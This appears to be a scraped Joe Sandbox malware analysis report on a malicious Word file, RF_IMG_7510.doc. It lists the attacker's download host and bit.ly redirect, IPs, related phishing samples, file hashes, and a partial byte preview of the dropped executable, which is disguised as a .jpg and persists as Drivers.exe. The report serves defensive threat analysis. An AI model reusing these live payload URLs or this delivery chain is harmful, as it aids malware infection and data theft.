                      SourceDetectionScannerLabelLinkDownload
                      11.2.Drivers.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File
                      7.2.69577.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      qadir.tickfa.ir4%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ofpDdlcDvB.net0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://nobettwo.xyz0%Avira URL Cloudsafe
                      http://ofpDdlcDvB.nett;0%Avira URL Cloudsafe
                      http://oVNzXy.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://qadir.tickfa.ir/I4/RF_IMG_7510.jpg0%Avira URL Cloudsafe
                      http://java.c0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      qadir.tickfa.ir
                      188.253.2.221
                      truefalseunknown
                      bit.ly
                      67.199.248.10
                      truefalse
                        high
                        nobettwo.xyz
                        198.54.126.101
                        truetrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ofpDdlcDvB.nettrue
                          • Avira URL Cloud: safe
                          unknown
                          http://bit.ly/2MrI2J8false
                            high
                            http://qadir.tickfa.ir/I4/RF_IMG_7510.jpgtrue
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.windows.com/pctv.powershell.exe, 00000009.00000002.2127498758.0000000002A50000.00000002.00000001.sdmpfalse
                              high
                              http://127.0.0.1:HTTP/1.169577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              low
                              http://investor.msn.compowershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpfalse
                                high
                                http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpfalse
                                  high
                                  http://DynDns.comDynDNS69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmptrue
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmptrue
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://nobettwo.xyz69577.exe, 00000007.00000002.2346066347.0000000002632000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ofpDdlcDvB.nett;69577.exe, 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  low
                                  http://oVNzXy.com69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/69577.exe, 00000004.00000002.2091326557.0000000000CD0000.00000004.00000001.sdmp, Drivers.exe, 00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmpfalse
                                    high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmptrue
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpfalse
                                      high
                                      http://java.cpowershell.exe, 00000009.00000002.2124110891.0000000000488000.00000004.00000020.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmptrue
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2092481447.00000000021B0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2348622133.0000000005B10000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000003.2087659071.00000000004F0000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.2121184838.000000000048C000.00000004.00000001.sdmpfalse
                                            high
                                            http://investor.msn.com/powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000003.2087659071.00000000004F0000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.2121184838.000000000048C000.00000004.00000001.sdmpfalse
                                                high
                                                https://api.ipify.org%GETMozilla/5.069577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmptrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                http://www.%s.comPApowershell.exe, 00000005.00000002.2092481447.00000000021B0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2348622133.0000000005B10000.00000002.00000001.sdmptrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                https://api.ipify.org%69577.exe, 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmptrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip69577.exe, 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 00000008.00000003.2116679901.00000000006D0000.00000004.00000001.sdmptrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                188.253.2.221
                                                unknownAustralia
                                                62048ACAIIRfalse
                                                67.199.248.10
                                                unknownUnited States
                                                396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                198.54.126.101
                                                unknownUnited States
                                                22612NAMECHEAP-NETUStrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:358285
                                                Start date:25.02.2021
                                                Start time:11:38:28
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 10s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:RF_IMG_7510.doc
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.spyw.expl.evad.winDOC@13/15@6/3
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 0.5% (good quality ratio 0.5%)
                                                • Quality average: 58.1%
                                                • Quality standard deviation: 31.9%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .doc
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                • TCP Packets have been reduced to 100
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:39:36API Interceptor58x Sleep call for process: EQNEDT32.EXE modified
                                                11:39:39API Interceptor1073x Sleep call for process: 69577.exe modified
                                                11:39:41API Interceptor17x Sleep call for process: powershell.exe modified
                                                11:39:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                                11:39:54API Interceptor859x Sleep call for process: Drivers.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                188.253.2.221swift_BILLING INVOICE.docGet hashmaliciousBrowse
                                                • qadir.tickfa.ir/ID3/ZkKfnBXzyAM9ArT.jpg
                                                Order.docGet hashmaliciousBrowse
                                                • qadir.tickfa.ir/ID3/IMG_0273_Scanned.jpg
                                                QUOTE.docGet hashmaliciousBrowse
                                                • qadir.tickfa.ir/ID3/IMG_0352_Scanned.jpg
                                                IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                • qadir.tickfa.ir/ID3/IMG_57109_Scanned.jpg
                                                67.199.248.10QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • bit.ly/3kkbCws
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • bit.ly/3qRJHq9
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • bit.ly/3pRAooT
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • bit.ly/2ZKf4aq
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • bit.ly/3aLCPVF
                                                PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                • bit.ly/3pNzHgj
                                                PO55004.docGet hashmaliciousBrowse
                                                • bit.ly/3kioaoe
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • bit.ly/2NUvTNf
                                                RFQ Document.docGet hashmaliciousBrowse
                                                • bit.ly/3qOyCWN
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                • bit.ly/3qN5fEA
                                                Order.docGet hashmaliciousBrowse
                                                • bit.ly/3boWBW4
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • bit.ly/2NScGvD
                                                IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                • bit.ly/3kemdsK
                                                Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                                • bit.ly/2Me6ei3
                                                swift payment.docGet hashmaliciousBrowse
                                                • bit.ly/2NmOCRI
                                                IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                • bit.ly/3qIRVRz
                                                IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                • bit.ly/3duA4tQ
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • bit.ly/3sdTreK
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                • bit.ly/3dCBRgm
                                                DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                • bit.ly/3bhrITG

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                qadir.tickfa.irswift_BILLING INVOICE.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                Order.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                QUOTE.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                bit.lyswift_BILLING INVOICE.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                CsmBq6KLHu.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                purchase order_2242021.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                PO55004.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                RFQ Document.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                Order.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTE.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                                • 67.199.248.10

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                ACAIIRswift_BILLING INVOICE.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                Order.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                QUOTE.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                • 188.253.2.221
                                                https://kollab.blog.br/wp-content/parts_service/4e63pu/xl196581369633lp3r5d47sny217cnodjm/Get hashmaliciousBrowse
                                                • 188.253.2.205
                                                https://kollab.blog.br/wp-content/parts_service/4e63pu/xl196581369633lp3r5d47sny217cnodjm/Get hashmaliciousBrowse
                                                • 188.253.2.205
                                                13268989.docGet hashmaliciousBrowse
                                                • 188.253.2.205
                                                GOOGLE-PRIVATE-CLOUDUSswift_BILLING INVOICE.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                CsmBq6KLHu.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                Details van vereiste.ppsGet hashmaliciousBrowse
                                                • 67.199.248.16
                                                purchase order_2242021.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                Offerte aanvragen 22-02-2021.pptGet hashmaliciousBrowse
                                                • 67.199.248.16
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                PO55004.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                RFQ Document.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                Order.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                QUOTE.docGet hashmaliciousBrowse
                                                • 67.199.248.11
                                                DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                • 67.199.248.10
                                                NAMECHEAP-NETUSPDA BGX00001A DA Query Notification BGX009RE09000001A.xlsxGet hashmaliciousBrowse
                                                • 198.54.121.237
                                                Shipping_Documet.xlsxGet hashmaliciousBrowse
                                                • 198.54.112.233
                                                QUOTATION.xlsxGet hashmaliciousBrowse
                                                • 198.54.121.237
                                                QUOTATION.xlsxGet hashmaliciousBrowse
                                                • 198.54.121.237
                                                OFFER.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                RPQ_1037910.exeGet hashmaliciousBrowse
                                                • 162.213.253.52
                                                KQ8FEB2021.exeGet hashmaliciousBrowse
                                                • 162.213.253.54
                                                y1dGqCeJXQ.exeGet hashmaliciousBrowse
                                                • 162.213.253.54
                                                Scan #84462.xlsmGet hashmaliciousBrowse
                                                • 63.250.38.58
                                                Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                                • 63.250.38.58
                                                Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                                • 63.250.38.58
                                                Notice 698.xlsmGet hashmaliciousBrowse
                                                • 63.250.38.58
                                                7ufnEJRkxE.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                pHmpCUO2W2.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Price quotation.exeGet hashmaliciousBrowse
                                                • 198.54.125.81
                                                267700.xlsxGet hashmaliciousBrowse
                                                • 198.54.121.237
                                                267700.xlsxGet hashmaliciousBrowse
                                                • 198.54.121.237
                                                shipping document.docGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                SecuriteInfo.com.W32.MSIL_Kryptik.COP.genEldorado.31763.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                SecuriteInfo.com.TR.AD.AgentTesla.yuenz.18281.exeGet hashmaliciousBrowse
                                                • 198.54.122.60

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpg
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:downloaded
                                                Size (bytes):620032
                                                Entropy (8bit):7.223416647299071
                                                Encrypted:false
                                                SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                                MD5:3A89CF2D6D2449EF1A9640AF29F3A782
                                                SHA1:220B9C5B4C7E9DE15753F629DA1AC3A075DC0800
                                                SHA-256:3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
                                                SHA-512:8B016C645C5CC5874F9FBD9539846CC74A07BA33DB75E11D0FD80EEEC8D0DCAE081B7B4A4090B5F806A2CE38BD8EACA859E15962441C691FD42995AE7FF9F974
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Reputation:low
                                                IE Cache URL:http://qadir.tickfa.ir/I4/RF_IMG_7510.jpg
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............t..............@..B........................H.......t................-..Vf..........................................6.~....(#...&*6.r...p(?...&*..*....oe...}......of...}......}....*.(....r...p(.........~....~....op...oq..........*B.(r......(.....*.(}........*".(.....*&.(r.....*".......*".(.....*Vs....(....t..... ...*...0............}.....(.......(......{....r...po......{.....o.......}.....s....}......(....r...p(....}.....{....(....&..{....(.....i}.....(.....*..0..c.........{.........,f...s....}.....{.....o.......}.....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2MrI2J8[1].htm
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:HTML document, ASCII text
                                                Category:dropped
                                                Size (bytes):128
                                                Entropy (8bit):4.845687067873127
                                                Encrypted:false
                                                SSDEEP:3:qVvzLURODccZ/vXbvx9nDyiPRXOEaKw7iOMtFSXbKFvNGb:qFzLIeco3XLx92iZXeKw7iR3SLWQb
                                                MD5:651DF23055EC48D1ECB1CF4F16897DA4
                                                SHA1:EBFFB61C881023BD561CD4409F914AAEA8E5F5E8
                                                SHA-256:C2DC5F8CA81FBAAAF8EADB0BB9629E2F75F6ACDE95507602FB136E2C7DDC4461
                                                SHA-512:398314C28AD10B1659AA8D38C2EB8EB433DDA2449BE328793726056827345DACA53A1EBAA1E733EAA4ABF4B91C97AFB8397AD258D52CA37DBB073763CCD87455
                                                Malicious:false
                                                Reputation:low
                                                Preview: <html>.<head><title>Bitly</title></head>.<body><a href="http://qadir.tickfa.ir/I4/RF_IMG_7510.jpg">moved here</a></body>.</html>
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3E742551-7EEA-4C35-8799-54095299238F}.tmp
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1759682
                                                Entropy (8bit):4.154806335732111
                                                Encrypted:false
                                                SSDEEP:24576:0kIEaE6EFEAEGP0EFEQTLEXEn8JETE3w/EnErEvfPEjEzIdE7E8:0btxqT5sqb3UgqM8ogIMn0omwt
                                                MD5:1184A9CD1C60C365BBABEE13DEAA943D
                                                SHA1:D15BDE924ACB60CC40696C85B16A70F80A5FDB7B
                                                SHA-256:18AEF79814D973B34CC3D9EDEAE640EC712A137D2782B9FC51D36DCB24CB5920
                                                SHA-512:09046E50D6731192FA82A3CD4D902C52A7B81969193090B3B3E45B54383CE860C434141E49D56C337008CDB5721FFCFAA35CA9696FBABDF1F3DE5AA1B0799E00
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..@.m.4.2.J.E.U.a.4.S.r.c.l.Z.j.j.E.@.-.K.I.2.W.T.Y.r.C.C.I.Y.w.a.u.Z.0.C.<.e.h.&.&.7._.M.-.C._.D.-.-._.-.V.,.6.4.>.8.8.9.6.4.$.C.v.>.y.t.=.n.6.|.:.%._.>.j.n.8.%.b.m.;.=.u...1.4..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43BDFCF0-FFD8-4816-B513-C2DC6937B540}.tmp
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9312A5BA-14BB-458B-BB2D-5B313121AE89}.tmp
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.3568273340340578
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb9:IiiiiiiiiifdLloZQc8++lsJe1Mzw/
                                                MD5:6CB90A071A327A68B86DBEE0DFC51AB9
                                                SHA1:D502B999C7E0ED3A7078C4618AF14359C1DBF6DC
                                                SHA-256:41045725B9169053A88265BCA4FFDD59ADB93D5E47F92A913B1AD87FBCC7D68B
                                                SHA-512:5E40A303283DBBC503CE8CD94044B92CD281237CE7EAA45F7F9001E9B1A71E641478AE74E8ADAB4B9AE3E0CD2287E7B36A90ADE08D718FA233CA3517D5EA9695
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RF_IMG_7510.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
